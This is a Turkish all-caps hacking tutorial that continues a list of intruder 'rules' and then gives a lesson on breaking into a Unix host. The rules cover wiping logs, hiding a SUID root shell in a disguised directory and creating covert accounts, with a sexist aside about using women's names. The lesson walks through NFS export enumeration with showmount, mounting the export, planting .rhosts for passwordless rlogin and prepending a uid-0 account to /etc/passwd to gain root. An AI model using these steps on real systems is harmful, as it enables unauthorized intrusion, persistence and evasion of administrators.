3) ILK ELEKTRONIK OYUNCAGINI KURCALAYIP BOZAN SALAK OGLAN POZISYONUNA DUSMEYIN.SISTEME ZARAR VERMEYIN,DOSYALARI SILMEYIN,GEREKLI OLMADIKCA DEGISTIRMEYIN,VIRUS YUKLEME GIBI SALAKLIKLAR YAPMAYIN.KISACASI GIRDIGINIZ GIBI EFENDICE CIKIN.KARDA YURUYUP IZINI BELLI ETMEMENIN HACK LUGATINDA KARSILIGI BUDUR.AKSINI YAPARSANIZ,BENI UYARMADI DEMEYIN KARDESIM...
4) DIGER KULLANICILARA BULASMAYIN.TAMAM ONLARIN DOSYALARINI OKUYUN,PROGRAMLARINI KURCALAYIN AMA ADAMLARA PISLIK YAPMAYIN.PISLIK YAPARSANIZ,ELINIZE-YUZUNUZE BULASACAGINI AKLINIZDA TUTUN.KEVIN MITCNIK NIYE YAKALANDI BILIYORMUSUNUZ?SHIMUMORA ADLI,GUVENLIK SISTEMLERINDEN SORUMLU ESKI BIR HACKERA PISLIK YAPTI.ADAMIN SISTEM YONETICILIGI YAPTIGI SITEYI HACKLEYIP,BAZI DOSYALARI ADAMIN BULABILECEGI DOST BIR SERVER ALTINA KOPYALADI.PISLIK VE MEYDAN OKUMA DURUMLARI YANI.BALTAYI TASA VURDU, KARARGAH OLARAK KULLANDIGI EVDEN OLMUS ARMUT GIBI TOPLANDI.SIZIN KEVIN'DAN DAHA IYIYIM GIBI SALAK SULAK FIKIRLERINIZ VARMI BILMEM AMA BEN ALMAYAYIM.
5) HACKLEDIGINIZ SISTEME BIR PASSWD KOPYALAYACAK YANI KENDINIZE BIR ACCOUNT AYARLAYACAKSANIZ,ONCE DIGER PASSWD'LARIN YAPISINA BAKACAKSINIZ.DIYELIM TUM ADLAR 3 HARF KISALTMASINDAN OLUSUYOR.SIZ DE,KEK GIBI ABDURRAHMAN ADINA ACCOUNT YAZDINIZ.GECMIS OLSUN.KENDI KENDINIZI YAKALATTINIZ...
6) HERZAMAN KADIN ADI KULLANIN.KADIN HACKER PEK OLMADIGI ICIN (KAFALARI BASMIYOR MU NE) DAHA AZ KUSKU CEKERSINIZ.ERKEKLER GIRECEK DELIK ARAYAN AYAKLI PENISLERDIR DEMIS FREUD.KULLANIN REALITEYI...SYSADM,SIZI ATMADAN COOOK DUSUNUR,EGER KADIN ADI TASIYORSANIZ...
7) HACKLEDIGINIZ UNIX SISTEMINE PARA HARCATMAYIN.OUTDIAL FONKSIYONUNU SUISTIMAL ETMEYIN.PAD VARSA GEREKLI OLMADIKCA KULLANMAYIN...
8) HACKLERKEN TROJAN KULLANDIYSANIZ,SILMEYI ASLA VE ASLA UNUTMAYIN.SOYADINI UNUTTUGUM BIR HACKER -ADI PAUL- ,INTELIN SISTEM YONETICILIGINE GETIRILMIS.UNIX ALTINDA CALISTIRDIGI TROJAN,BASKA BIR SISTEM YONETICISI TARAFINDAN YAKALANINCA ISTEN ATILIP YARGILANMIS.HIKAYEYI MAXIMUM SECURITY ADLI KITAPTAN OKUYABILIRSINIZ...
9) HACKLEDIGINIZ SISTEME ASLA "BURAYI BILMEM KIM HACKLEDI" GIBI NOTLAR BIRAKMAYIN.TAMAM,PEK GURUR VERICI GIBI GOZUKUYOR AMA ORAYA GIRENE KADAR GOBEGINIZIN CATLADIGINI UNUTMAYIN.IKI GUNDE GIRDIGINIZ YERDEN,IKI SAATTE ATILMAK HOS OLUR DERSENIZ,KEYFINIZ BILIR KARDESLERIM...
10) BASARILI OLDUYSANIZ,SAGDA SOLDA LAK LAK ETMEYIN.ICKI MASASINDA TANIMADIGINIZ ADAMA ACILMAYIN.SIFRELERINIZI EN YAKIN DOSTLARINIZA BILE ANLATMAYIN...
11) SISTEMDEKI IZLERINIZI YOK EDIN./var ALTINDA KAYDINIZI BULUP YOKETMEK VEYA su KULLANDIYSANIZ sulog DOSYASINI TEMIZLEMEK GIBI...
12) COK FAZLA DISK ALANI KULLANIRSANIZ,TUM DIKKATLERI USTUNUZE TOPLAYACAGINIZI AKLINIZDA TUTUN.
13) SUID SHELL'LERINIZI GIZLEYIN.ORNEK;
ONCE BIR KLASORE GIDIN: % cd /etc
% mkdir "..  "
% cd "..  "
cp /bin/sh ".gizli"
chmod a+s ".gizli"
MKDIR VE CD KOMUTLARINDA .. ISARETLERINDEN SONRA IKI KARAKTERLIK BOSLUK BIRAKTIK.SYSADM,BIRAKTIGIMIZ BOS KARAKTER SAYISINI AKLINA GETIRMEK VE BULMAK ZORUNDA.KISACASI EXTRA GUVENLIK ONLEMI ALDIK.
14) ASLINDA BU MADDEYI YAZMAYACAKTIM AMA 13 MADDE OLACAKTI.UGURSUZLUK HESABI...ISA PEYGAMBERIN SON YEMEGI 13 KISILIKTI :))))
EVET DOSTLAR,BIR DERS DAHA BITTI.CEVIRIN SAYFAYI BAKALIM

USTALIĞA DOĞRU 3

BIR SISTEM HAKKINDA BILGI ALMANIN BASLICA YOLLARINDAN BIRI "finger" KOMUTUYDU."finger @hedef.com" BASLICA KULLANIM FORMU OLMAKLA BERABER, "flag" DENILEN PARAMETRELERLE KULLANIMI DA VARDIR.ORNEGIN:"finger -l hedef.com" GIBI.AYRINTILI PARAMETRE KULLANIM BILGISINI "man finger" YAZARAK OGRENIN VE PRATIK YAPIN.HEDEF SECTIGINIZ SITE GUVENLIK NEDENIYLE FINGER PORTUNU KAPATMISSA,SONUC HAYAL KIRIKLIGI OLACAKTIR.UNUTMAMAMIZ GEREKEN NOKTA,AZIMLE PISLEYEN TASI DELER ATASOZU OLUP,DIGER YONTEMLERE DOGRU YELKEN ACMAMIZ GEREGIDIR.SIRADAKI BILGI TOPLAMA VE AYNI ZAMANDA HACK ARACI OLAN "mount" VE "showmount" KOMUTLARIDIR.YONTEMIMIZIN SAKINCASI,ARACI OLARAK KULLANDIGIMIZ UNIX SERVERIN HER ZAMAN BU KOMUTLARA OLAMAYABILECEGIDIR.YILLIK BELLI BIR UCRET KARSILIGINDA,UNIX HIZMETINI KISITLAMA OLMADAN SUNAN SERVERLARI www.altavista.com ARAMA MOTORUNA UNIX YAZARAK BULABILIR VE ABONE OLABILIRSINIZ.VAMPIRINIZ FAKIR BIR DEVLET MEMURU OLDUGUNDAN,BU KOMUTLARI KULLANAMAYAN BEDAVA SITELERDEN IS BITIRMEKTE AMA SERVET DUSMANI OLMADIGINDAN DOLAYI DA PARALI KARDESLERIMIZIN KULLANABILECEGI HACK YONTEMLERINI DE ACIKLAMAKTA.KOLAY GELSIN....ONCELIKLE mount KOMUTUNU KISACA ANLATALIM.EKLE,YAPISTIR GIBI ANLAMLARA GELMEKTE.BIR UNIX SERVERINDA AYNI OZEL PC'NIZDE OLDUGU GIBI BIRDEN FAZLA DISK OLABILIR.BU DISKLER SISTEM AGI ICINDA mount KOMUTU ILE BIRLESTIRILIR.SISTEM ACILDIGINDA HANGI DISKIN VE HANGI PARTITISYONLARIN KULLANILACAGI YANI YUKLENECEGI,SISTEM YONETICISI TARAFINDAN CONFIGURE EDILIR.CONFIGURE ETMEK,AYARLAMAK ANLAMINDADIR.PARTITISYON ISE BOLUMLER ANLAMINA GELIR.BOLUMLER BIR DISKDE 3 PARCADIR.BUNLARIN BIRINCISI "/" YANI ANA KLASORDUR.IKINCISI user ADLI KLASOR OLUP,TUM KULLANICILARIN ORTAK GEREKSINIM DUYDUKLARI KOMUTLARI,PROGRAMLARI FILAN ICERIR.SON BOLUM ISE home DENILEN KULLANICILARIN BULUNDUGU BOLUMDUR.SISTEME BAGLANDIGINIZ ANDA ONCELIKLE "/" BOLUMU YUKLENIR.mount KOMUTU ILE BASKA BIR PARTITISYONU BU ANADISKE EKLEYEBILIR VEYA BASKA BIR DISKE ANADISKI EKLEYEBILIRSINIZ.showmount KOMUTU ISE UZAKTAKI SISTEMIN PARTITISYONLARINI GOSTERIR.BU BILGILER ISIGI ALTINDA HACK GIRISIMINE BASLAYALIM.HACKLEYECEGIMIZ SITE HAYALI KURBAN.COM'DUR.SIZ KENDI GERCEK SITE ADRESINI YAZIN."%" ISARETI ISE KULLANDIGIM SHELL'IN PROMPTU OLUP,SIZINKININ FARKLI OLMASININ BIR ONEMI YOK,KOMUTLARA EKLEME SALAKLIGINI GOSTERIP,HOCANIZI UZMEYIN LUTFEN.SIMDI IZLEYIN BAKALIM:
% showmount -e kurban.com
export list for kurban.com
/export         (everyone)
/var            (everyone)
/usr                 easy
export/exec/kvm/sun.4c.sunos.4.1.3             easy
/export/root/easy     easy
/export/swap/easy     easy
VAMPIRIN ARA NOTU:foo VARIABLES YANI DEGISKENLER ANLAMINDA KULLANILAN INTERNATIONAL BIR TERIMDIR.YUKARIDA GORDUGUNUZ UZERE export/foo YANI export VE TUM ALTI DIS DUNYAYA ACIKTIR.EXPORT AYNI ZAMANDA,KULLANICI GUEST OLARAK BIZIMDE HOME KLASORUMUZDUR.KENDI SISTEMIMIZDE BIR GUEST HESABI OLUSTURUP BUNU KARSI TARAFA YOLLAYACAGIZ.DAHA SONRA BU HESAP ALTINDA BIR rhosts DOSYASI YARATACAGIZ VE TEKRAR LOGIN OLDUGUMUZDA BIZI AILEDEN KABUL EDIP ICERI ALACAKLAR.SIMDI IZLEYIN:
mount kurban.com:/export/foo /foo (BU KOMUTLA KURBANIN EXPORT KLASORUNU BIZIM SERVERDA /foo KLASORUNE KOPYALA ANLAMINA GELIR)
cd /foo (foo KLASORUNE GIT DEMEKTIR)
ls -lga (HEPSINI EKRANA GONDER DEDIK VE SONUC:)
1 drwxr-xr-x 18 root daemon 347 mar 23 06.34 .
1 drwxr-xr-x 5 wheel daemon 465 jul 16 23.14 ..
1 drwxr--x--x 9 10004 daemon aug 3 12.45 guest
HEMEN TEKRAR KOMUT YAZIYORUZ LAVUKLARA:
echo guest:x:10004:1:gecici_hesap:/: >> /etc/passwd (GUEST HESABI YARATTIK)
ls -lga  (ALALIM LISTEYI DEMEKTIR.YUKARIDAKI 3 KLASORDEN, UCUNCUSU SU SEKILDE DEGISMIS OLARAK EKRANA GELIR.)
1 drwx--x--x guest daemon aug 3 12.45 guest (YANI GUEST HESABI YARATMIS OLDUK KISACASI.10004 DEGIL GUEST YAZIYOR YUKARIDA,DIKKAT)
su guest (GUEST'E SU OZELLIGI YANI SUIT VERIYORUZ)
echo kurban.com >> guest/.rhosts (HESABIMIZIN ALTINA BIZI TANIYIP,SIFRESIZ ICERI ALMASINI SAGLAYACAK "rhosts" 'u GIZLI DOSYA OLARAK YERLESTIRDIK)
rlogin kurban.com (KURBAN.COM'A TEKRAR LOGIN OL DEDIK.VE CEVAP:)
WELLCOME KURBAN.COM
KURBAN %
YETTI MI BU KADARI?ELBETTE HAYIR.EVET KURBAN.COM'U HACKLEDINIZ AMA YUKARIDAKI SATIRDA GORDUGUNUZ GIBI PROMPTUNUZ UYUZ BIR SIRADAN SHELL ISARETI.YANI root OLAMADINIZ MAALESEF.OKEY,HAYDI OLALIM VE ZAFERI TACLANDIRALIM:
% rsh kurban.com csh -i (SISTEME GIRERKEN PEK KAYIT IZI BIRAKMAYAN BIR KOMUTTUR.TAVSIYE OLUNUR.
KURBAN % ls -ldg /etc
drwxr-sr-x 12 bin bokpusur 1254 jul 31 05.12 /etc
kurban % mv passwd pw.old
(echo vampir::0:1:anýnda_goruntu_baba:/:/bin/sh; cat pw.old ) > passwd
kurban % ^D (BU KOMUT BAGLANTIMIZI KOPARIR)
% rlogin kurban.com -l vampir
kurban # (ARTIK root'SUNUZ.TEBRIKLER)